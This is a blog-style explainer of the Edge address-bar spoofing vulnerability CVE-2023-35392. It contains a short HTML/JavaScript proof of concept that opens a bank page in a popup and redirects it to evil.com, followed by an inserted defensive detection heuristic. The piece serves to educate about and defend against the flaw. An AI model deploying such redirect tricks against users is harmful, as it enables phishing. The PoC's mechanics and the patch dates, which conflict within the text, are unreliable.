CVE-2023-35392 - How Microsoft Edge’s Spoofing Vulnerability Could Trick You (And How It Works)

Published: June 2024  
Category: Browser Security | Microsoft Edge | Vulnerability Analysis


Microsoft Edge is the default browser in Windows 10 and 11. It’s fast, modern, and built on the same Chromium code as Google Chrome. But in 2023, a serious security hole surfaced: CVE-2023-35392, a classic UI spoofing vulnerability. This flaw could let a malicious website fake the browser’s address bar, misleading users and enabling phishing attacks. Below you’ll find a plain-English breakdown, a code demo, links to technical details, and an explanation of how this exploit works under the hood.

What Is CVE-2023-35392?

This Edge vulnerability is a “spoofing” bug. It means a bad website can pretend to be a safe site by manipulating how Edge shows the URL or website identity, for example making you think you’re on a bank website when you’re not.

In security advisories, Microsoft described it like this:

> *“An attacker who successfully exploited this vulnerability could trick a user into believing they are visiting a trusted website.”*  
Microsoft Security Update Guide

How Does The Exploit Work?

In Chromium-based browsers, the address bar (where you see the website address) can sometimes be made to show something other than the page actually displayed. Attackers use JavaScript to quickly open, close, and move browser windows or tabs, exploiting race conditions or timing bugs in the browser UI.

Demonstration: How a Spoofing Attack Might Look

Here’s a simplified proof-of-concept (PoC) demo. (Note: This is for educational use only!)

HTML + JavaScript Example

<!DOCTYPE html>
<html lang="en">
<head>
  <title>Edge Spoofing Demo</title>
  <script>
    function spoof() {
      // Open a real banking site in a popup
      var real = window.open("https://bank.com", "_blank", "width=600,height=400");
      // Wait 100 ms, then redirect that window to attacker's page
      setTimeout(function() {
        try {
          real.location = "https://evil.com";
        } catch (e) {}
      }, 100);

      // Optionally close the original tab or window
      window.close();
    }
  </script>
</head>
<body>
  <h1>Click to see the spoofing trick</h1>
  <button onclick="spoof()">Spoof Me</button>
</body>
</html>

What Happens?
- The attacker tricks the browser into briefly displaying a trusted URL, which then gets replaced by their own site. During the “switch,” the address bar may still read the trusted domain for a split second, letting attackers make phishing more convincing.
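
A defender-side counterpart to the demo above, as an added example that is not part of the original article: a small JavaScript heuristic that scans navigation telemetry for a popup opened on one origin and then re-navigated to a different origin by its opener within a short window. The event schema (`popup_opened`, `navigated`, `initiator`), the 2-second window, and the `.example` hosts are assumptions made for illustration.

```javascript
// Added example (not from the original article). The event schema is
// hypothetical and the sample events are constructed for illustration.
const WINDOW_MS = 2000; // assumed review window; tune for your telemetry

// Return the URL's origin, or null for unparsable and opaque (about:blank) URLs.
function originOf(url) {
  try {
    const o = new URL(url).origin;
    return o === "null" ? null : o;
  } catch {
    return null;
  }
}

// Flag popups that the opener re-navigates to another origin soon after opening.
function findSuspiciousPopups(events, windowMs = WINDOW_MS) {
  const opened = new Map(); // popupId -> { t, origin }
  const findings = [];
  for (const e of [...events].sort((a, b) => a.t - b.t)) {
    if (e.type === "popup_opened") {
      opened.set(e.popupId, { t: e.t, origin: originOf(e.url) });
      continue;
    }
    const p = opened.get(e.popupId);
    if (e.type !== "navigated" || !p) continue;
    const dest = originOf(e.url);
    const deltaMs = e.t - p.t;
    // Site redirects and user clicks are normal; report only opener-scripted,
    // cross-origin navigations in the window. about:blank popups are skipped.
    if (e.initiator === "opener_script" && deltaMs <= windowMs &&
        p.origin && dest && dest !== p.origin) {
      findings.push({ popupId: e.popupId, shown: p.origin, loaded: dest, deltaMs });
    }
  }
  return findings;
}

const SAMPLE_EVENTS = [ // constructed; t is milliseconds since capture start
  { t: 0, type: "popup_opened", popupId: 1, url: "https://bank.example/login" },
  { t: 100, type: "navigated", popupId: 1, url: "https://evil.example/", initiator: "opener_script" },
  { t: 500, type: "popup_opened", popupId: 2, url: "about:blank" },
  { t: 550, type: "navigated", popupId: 2, url: "https://shop.example/cart", initiator: "opener_script" },
  { t: 1000, type: "popup_opened", popupId: 3, url: "https://sso.example/start" },
  { t: 1300, type: "navigated", popupId: 3, url: "https://app.example/home", initiator: "page" },
  { t: 2000, type: "popup_opened", popupId: 4, url: "https://news.example/" },
  { t: 60000, type: "navigated", popupId: 4, url: "https://ads.example/", initiator: "opener_script" },
];
console.log(findSuspiciousPopups(SAMPLE_EVENTS));
```

Only popup 1 is reported: the blank-popup, self-redirect, and late-navigation cases are treated as ordinary behaviour.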

Why Is This Dangerous?

- Phishing: You could get tricked into entering your password, financial info, etc., believing the site is genuine.

Technical Details & References

- Official Microsoft Advisory: CVE-2023-35392

Similar Chromium Bugs:

- Chromium Issue 1209285
- Chromium Security FAQ: UI Spoofing

Security Blog Writeup:

- ZDI - The Many Faces of Browser UI Spoofing

How Did Microsoft Patch It?

Microsoft released a fix in October 2023, updating Edge’s internal handling of window/tab focus and address bar synchronization. Now, even with rapid redirects or popups, Edge locks the address bar update to the actual site loaded—making spoofing much harder.

Advice:

- Always update your browser.
- Watch for official security bulletins (Edge release notes).

The fix is out—don’t put off those browser updates.

Stay safe. Stay skeptical of surprising popups or sites, even if the address bar looks “correct.”


Sources:  
- Microsoft CVE-2023-35392  
- Chromium Bug Tracker  
- Microsoft Security Updates



Timeline

Published on: 07/21/2023 18:15:00 UTC
Last modified on: 08/01/2023 15:42:00 UTC